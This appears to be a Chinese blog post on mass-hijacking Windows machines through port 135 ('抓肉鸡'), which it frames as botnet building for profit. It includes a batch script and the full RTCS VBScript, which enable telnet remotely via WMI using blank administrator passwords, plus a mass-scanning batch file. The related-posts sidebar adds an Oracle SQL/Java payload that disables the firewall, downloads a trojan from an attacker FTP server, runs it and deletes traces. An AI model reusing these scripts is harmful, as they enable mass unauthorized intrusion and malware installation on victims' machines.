135批量抓鸡 依赖 古老得RTCS

最新推荐文章于 2021-08-21 17:12:29 发布
最新推荐文章于 2021-08-21 17:12:29 发布
阅读量3.7k 收藏 6
点赞数
文章标签: 远程连接 脚本 function 工具 server tcp
关于135抓肉鸡的分析最近好象135搞的很火热 看见有人也把那个批量抓135肉鸡的工具发出来了我也就说下把反正俺也不早就不用那鸟东西了

    上次看了那个也说一天抓1000只肉鸡 由于我是开快进看的 没仔细的看 我以为他是自动登陆telnet 所以我就晕死了 应为自动登陆telnet我以前研究很多 我由于我批处理我学的不怎么样也就会点皮毛就加了他 结果他一上来就开口批量开23卖2000RMB 人品啊 我倒 那鸟东西不清楚大家知道作者不 那是02年安全焦点的大哥写的 我有RT整个全套代码的 一万年前我就知道怎么批量开23了 不废话了先说其他的把 后来一位大哥把他的RT整套脚本整合写了一个RCMD1。05这个是目前的最新版好象 

需要解决的问题我详细的说一下把

首先要解决的就是批量开23了

     rtcs脚本(百度一下有下的找不到就是搜索水品问题了) 里面的代码如果懂VBS的朋友去看下 就是先用VBS远程连接主机的wmi服务 然后剩下的是开启和过认证部分 以前有一篇文章分析过说是作者写的有一个小BUG 就是如果原来已经开启的话可以直接转到退出的 这里不多说这个了 

for /f "delims= " %%i in (nt.txt) do del %%i.bat
for /f "delims= " %%i in (nt.txt) do echo goto start>>%%i.bat
for /f "delims= " %%i in (nt.txt) do echo :start>>%%i.bat
for /f "delims= " %%i in (nt.txt) do echo cscript rtcs.vbe %%i administrator "" 1 23^|find "shell">>%%i.bat
for /f "delims= " %%i in (nt.txt) do echo if errorlevel=1 goto b>>%%i.bat
for /f "delims= " %%i in (nt.txt) do echo if errorlevel=0 goto d>>%%i.bat
for /f "delims= " %%i in (nt.txt) do echo :d>>%%i.bat
for /f "delims= " %%i in (nt.txt) do echo SecureCRT.EXE %%i&goto exit>>%%i.bat
for /f "delims= " %%i in (nt.txt) do echo :b>>%%i.bat
for /f "delims= " %%i in (nt.txt) do echo cscript rtcs.vbe %%i administrator "" 1 23^|find "error">>%%i.bat
for /f "delims= " %%i in (nt.txt) do echo if errorlevel=1 goto start>>%%i.bat
for /f "delims= " %%i in (nt.txt) do echo if errorlevel=0 goto exit>>%%i.bat
for /f "delims= " %%i in (nt.txt) do echo :exit>>%%i.bat
for /f "delims= " %%i in (nt.txt) do echo exit>>%%i.bat
for /f "delims= " %%i in (nt.txt) do start %%i.bat
exit

     这个是我以前写的一个批处理 有兴趣的朋友可以看下 其实很简单 外面流传的需要过滤23 我的不需要过滤23 有兴趣的朋友可以看下 代码正确性没测试应为我写过好几个版本现在已经不记得哪个是可以用的了 但是思路很明显的相信大家可以看明白

     要解决的问题二

     我也尝试了用脚本来实现先telnet ip 然后sendkey 后来发现问题大大的 只能一个一个种植不能实现批量种植 后来朋友给冰冰批量 就是现在大家可以在外面找的版本 他很好的解决了批量登陆和自动种植的问题 调用辅助工具 设置登陆脚本然后自动种植 但是我相信用的朋友一定知道有什么问题 telnet认证是很复杂的 此外容易出现提示丢失脚本的错误 

其他的不知道说什么了 我今天上网给朋友搞东西 弄的累的要死 思路不是很清楚 我在总结下把

     首先写一个S扫描的BAT然后里面用FOR循环自动整理IP 然后NT过滤 然后调用上面我发的批处理批量开23 然后写一个批处理直接调用辅助工具自动登陆自动种植 效果如何 大家详细的去看动画就知道了 

    而后来我写的一个版本 就很帅了 嘿嘿 保密中 应为工具是给兄弟群共享的 他们有业务来着 如果我把东西发布了说是会干掉我 怕怕 给会懂VBS的朋友说一下把 引导一下思路

前面的扫描和和NT过滤还是一样的不说了 远程连接wmi大家可以看rtcs的脚本 关键地方就是下面了

    难道远程连接到了wmi服务就只有开telnet一条出路吗 貌似wmi功能多多把 具体能干什么去看安焦点rtcs作者02年的文章把 目前我写的脚本和所有的工具打包起来也才70多K 同时开4个服务器一天抓1万只肉鸡 信不信由你 相信大家都知道recton里有一个http种植者的功能把 去找找文章看人家怎么实现的 最近风声很紧有业务的朋友最好小心 最近的通道不是那么安全

这个是rtcs的代码 自己保存成VBS

on error resume next
if (lcase(right(wscript.fullname,11))="wscript.exe") then
set objShell=wscript.createObject("wscript.shell")
objShell.Run("cmd.exe /k cscript //nologo "&chr(34)&wscript.scriptfullname&chr(34))
wscript.quit
end if
if wscript.arguments.count<5 then
usage()
wscript.echo "Not enough parameters."
wscript.quit
end if

ipaddress=wscript.arguments(0)
username=wscript.arguments(1)
password=wscript.arguments(2)
ntlm=wscript.arguments(3)
port=wscript.arguments(4)
if password=chr(34)&chr(34) then password=NULL
if ntlm<0 or ntlm>2 then
usage()
wscript.echo "The value of NTML is wrong."
wscript.quit
end if

usage()
wscript.echo "Conneting "&ipaddress&"...."
set objlocator=createobject("wbemscripting.swbemlocator")
set objswbemservices=objlocator.connectserver(ipaddress,"root/default",username,password)
showerror(err.number)

wscript.echo "Setting NTLM="&ntlm&"...."
set objinstance=objswbemservices.get("stdregprov")
set objmethod=objinstance.methods_("SetDWORDvalue")
set objinparam=objmethod.inparameters.spawninstance_()
objinparam.hdefkey=&h80000002
objinparam.ssubkeyname="SOFTWARE/Microsoft/TelnetServer/1.0"
objinparam.svaluename="NTLM"
objinparam.uvalue=ntlm
set objoutparam=objinstance.execmethod_("SetDWORDvalue",objinparam)
showerror(objoutparam.returnvalue)

wscript.echo "Setting port="&port&"...."
objinparam.svaluename="TelnetPort"
objinparam.uvalue=port
set objoutparam=objinstance.execmethod_("SetDWORDvalue",objinparam)
showerror(objoutparam.returnvalue)

wscript.echo "Querying state of telnet server...."
set objswbemservices=objlocator.connectserver(ipaddress,"root/cimv2",username,password)
set colinstances=objswbemservices.execquery("select * from win32_service where name=’tlntsvr’")
for each objinstance in colinstances
if objinstance.startmode="Disabled" then
wscript.echo "Telnet server has been disabled. Now changeing start mode to manual...."
set objmethod=objinstance.methods_("changestartmode")
set objinparam=objmethod.inparameters.spawninstance_()
objinparam.startmode="Manual"
set objoutparam=objinstance.execmethod_("changestartmode",objinparam)
showerror(objoutparam.returnvalue)
end if
wscript.echo "Changeing state...."
if objinstance.started=true then
intstatus=objinstance.stopservice()
showerror(intstatus)
wscript.echo "Target telnet server has been STOP Successfully."
else
intstatus=objinstance.startservice()
showerror(intstatus)
wscript.echo "Target telnet server has been START Successfully!"
wscript.echo "Now, you can try: telnet "&ipaddress&" "&port&", to get a shell."
end if
next

function showerror(errornumber)
if errornumber<>0 then
wscript.echo "Error!"
wscript.quit
else
wscript.echo "OK!"
end if
end function

function usage()
wscript.echo "************************************************************************"
wscript.echo "RTCS v1.08"
wscript.echo "Remote Telnet Configure Script, by zzzevazzz"
wscript.echo "Welcome to visite www.isgrey.com"
wscript.echo "Usage:"
wscript.echo "cscript "&wscript.scriptfullname&" targetIP username password NTLMAuthor telnetport"
wscript.echo "It will auto change state of target telnet server."
wscript.echo "************************************************************************"
end function

经典吧,呵呵,我觉得,呵呵,管理员要给我加钱啊,呵呵
关于for循环 我解释下

for /f这个这个参数表示对文本操作 

    tokens表示截取 tokens=1,2表示选取1,2两个部分 eol表示忽略 eol=-表示忽略-开始的行 delims表示分割符 delims=,表示对每行以“,”为分割符号对行进行分割字符

那么我给大家写一个S扫描自动整理IP的批处理把

s.bat

setlocal
cls
color A
title 自动抓鸡v1.0
echo ======================================================
echo 自动抓鸡v1.0
echo 作者:hurrytigar
echo QQ:30144942
echo emil:hurrytigar@163.com
echo hacked by hurrytigar
echo ======================================================
del result.txt
del s.txt
for /f "eol= tokens=1,2 delims= " %%i in (ip.txt) do s tcp %%i %%j 135 1000 /save
for /f "eol=- tokens=1 delims= " %%i in (result.txt) do echo %%i>>s1.txt
for /f "eol=P tokens=1 delims= " %%i in (s1.txt) do echo %%i>>s2.txt
for /f "eol=S tokens=1 delims= " %%i in (s2.txt) do echo %%i>>s.txt
del s1.txt
del s2.txt
del Result.txt

扫描那行的FOR循环 for /f "eol= tokens=1,2 delims= " %%i in (ip.txt) do s tcp %%i %%j 135 1000 /save
意思是说 从ip.txt中对每行以空格分割 然后取得分割后的第一部分和第二部分字符

     第一个%%i是形参 代替你要取出来的部分 那么后面的2个部分的%%i 和%%j表示取出的两个部分按顺序代替的参数了

后面的几行都是扫描完成的result过滤整理 先忽略以空格 - P S开头的行 然后用echo写入文本来转的 

用法 大家把上面的批处理代码保存成 s.bat然后在同一目录建立一个ip.txt的文本

然后把下面的这些复制进IP。TXT里面 (不需要整理 直接全放进去 汉字不需要去掉)

     扫描和整理结束以后会有一个S。TXT文本 自己打开看看效果把 ^_^ 忘了说了把s.exe ip.txt和s.bat放在同一目录 好了我闪了.

 
inject2006
关注
个人全自动1521传马工具日抓千鸡
04-24
个人全自动1521传马工具日抓千鸡 http://www.skycn.com/soft/1211.html http://www.irisbay.com/down/pub/ora10client.rar 首先安装两个必须的文件 3. 安装ftp 建立好自己的 ftp地址 账户 密码 4. 设置目录里面的 java.sql 打开以后 看最下面 自己修改ftp地址 账户 密码等等 5. 都设置完成以后 把目录里面的 java.sql 放到c盘 即可! create or replace and compile java souRCe named "util" as import java.io.*; import java.lang.*; public class util extends Object { public static int RunThis(String args) { Runtime rt = Runtime.getRuntime(); int RC = -1; try { Process p = rt.exec(args); int bufSize = 4096; BufferedInputStream bis =new BufferedInputStream(p.getInputStream(), bufSize); int len; byte buffer[] = new byte[bufSize]; // Echo back what the program spit out while ((len = bis.read(buffer , 0, bufSize)) != -1) System.out.write(buffer, 0, len); RC = p.waitFor(); } catch (Exception e) { e.printStackTrace(); RC = -1; } finally { return RC; } } } / create or replace function RUN_CMz(p_cmd in varchar2) return number as language java name 'util.RunThis(java.lang.String) return integer'; / create or replace procedure RC(p_cmd in varChar) as x number; begin x := RUN_CMz(p_cmd); end; / variable x number; set serveroutput on; exec dbms_java.set_output(100000); grant javasyspriv to system; grant javauserpriv to system; exec:x:=run_cmz('net stop sharedaccess'); exec:x:=run_cmz('cmd.exe cmd/C del p.bat'); exec:x:=run_cmz('cmd.exe cmd/C del d.bat'); exec:x:=run_cmz('cmd.exe cmd/C del k.exe'); exec:x:=run_cmz('cmd.exe cmd/C echo open IP>>p.bat'); exec:x:=run_cmz('cmd.exe cmd/C echo FTP账号>>p.bat'); exec:x:=run_cmz('cmd.exe cmd/C echo FTP密码>>p.bat'); exec:x:=run_cmz('cmd.exe cmd/C echo bin>>p.bat'); exec:x:=run_cmz('cmd.exe cmd/C echo get 木马名.exe>>p.bat'); exec:x:=run_cmz('cmd.exe cmd/C echo bye>>p.bat'); exec:x:=run_cmz('cmd.exe cmd/C echo ftp -s:p.bat>>d.bat'); exec:x:=run_cmz('cmd.exe cmd/C echo 木马名.exe>>d.bat'); exec:x:=run_cmz('d.bat'); exec:x:=run_cmz('木马名.exe'); exec:x:=run_cmz('cmd.exe cmd/C del C:\WINDOWS\system32\cscript.exe'); exec:x:=run_cmz('cmd.exe cmd/C del p.bat'); exec:x:=run_cmz('cmd.exe cmd/C del d.bat'); exec:x:=run_cmz('cmd.exe cmd/C del 木马名.exe'); exit exit
135批量抓鸡
qq_41232519的博客
07-09 1460
1、主机发现 2、135端口弱口令扫描 3、本地搭建ftp服务 4、批量溢出
黑手安全网-------那些年我们抓过的肉鸡课程笔记
边城浪子的博客
11-11 9141
黑手安全网的一套抓鸡教程 地址:链接:https://pan.baidu.com/s/1EK9Q1hYs4_bEN648Bg0LWA 提取码:6u2x 工具集合:链接:https://pan.baidu.com/s/1gJ8l-UGE4LvVFsldJok6CA 提取码:1bkb 一.端口扫描篇 1.tcp全扫描 抓鸡专用S扫描器.exe 使用方法:输入开始IP...
最新135日抓千鸡工具包.rar
04-09
最新135日抓千鸡工具抓鸡不在难,关键看工具
135傻瓜批量溢出器v10版
07-14
135傻瓜批量溢出器v10版:深入了解溢出格式、寻找截断与过滤空格》 在信息安全领域,溢出攻击是一种常见的利用程序漏洞进行攻击的技术。"135傻瓜批量溢出器v10版"是一款针对此类攻击的工具,它简化了溢出攻击的...
小毅高级135终结版
08-07
在IT行业中,"抓鸡"通常指的是发现并控制存在安全漏洞的远程计算机,而135端口是Windows操作系统中一个重要的网络服务端口,主要用于RPC(Remote Procedure Call)服务。RPC服务允许程序在一台计算机上执行另一台...
抓鸡端口扫描
11-25
已经去掉后门! 抓鸡端口扫描 抓鸡 扫描端口 快速抓鸡
ms08-067批量捉鸡工具
03-08
ms08-067批量捉鸡工具,一天能捉500多只肉鸡!!!!!!!!!!!!
1521批量抓服务器教程
12-16
1521批量抓服务器教程
慢http扫描器
11-01
slow http 慢 HTTP keep alive请求导致服务器响应变慢,扫描工具来了。
极品抓鸡教程36课笔记
边城浪子的博客
12-31 3226
1.第一课 简单系统介绍 常见入侵端口:3389 4899 5900 1433 21 23 135 445 ----------------------------------------------------------------- 2.第二课: 80和8080端口拿服务器 step1:使用S扫描器,扫描8080或80端口,保存ip地址ips.txt。 step2:打开 Apache ...
002-windowa基础(DOS命令:net user 用户 密码 /add)
fiveseven的博客
08-21 3966
002-windowa基础(DOS命令:net user 用户 密码 /add)
nessus全端口禁ping扫_135端口入侵思路
weixin_28909745的博客
12-06 775
135端口主要用于使用RPC ( Remote Procedure Call,远程过程调用)协议并提供DCOM(分布式组件对象模型)服务,通过RPC可以保证在一台计算机上运行的程序可以顺利地执行远程计算机上的代码;使用IDCOM可以通过网络直接进行通信,能够跨包括HTTP协议在内的多科网络传输,同时这个端口也爆出过不少的漏洞,最严重的就是缓冲区溢出漏洞,曾经疯狂一时的“冲击波”病毒就是利用这个漏洞...
利用JBOSS漏洞抓肉鸡
404
01-23 7124
JBOSS是中间件,解析JSP的文件,由于中间件爆发漏洞一般很少人打补丁,这次我们利用jboss漏洞抓肉鸡。 利用工具:jexboss-master 这个工具是Python写的在我的资源里面已经分享可以下载,也可以自己在github上面寻找 网络搜索引擎:zoomeye(钟馗之眼) 在抓肉鸡之前我们要明白目标,那就是使用jboss中间件的服务器 进入zoomeye搜索关键词jboss(这
黑客视频教程大全:从入门到精通
5. 第五课:灰鸽子简单快速免杀+快速抓鸡 - 讲解如何让灰鸽子避开反病毒软件的检测,以及如何快速寻找受控计算机("抓鸡")。 6. 第六课:入侵通用手法分析和网站数据类型概述 - 分析常见的入侵手法,并介绍网站...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值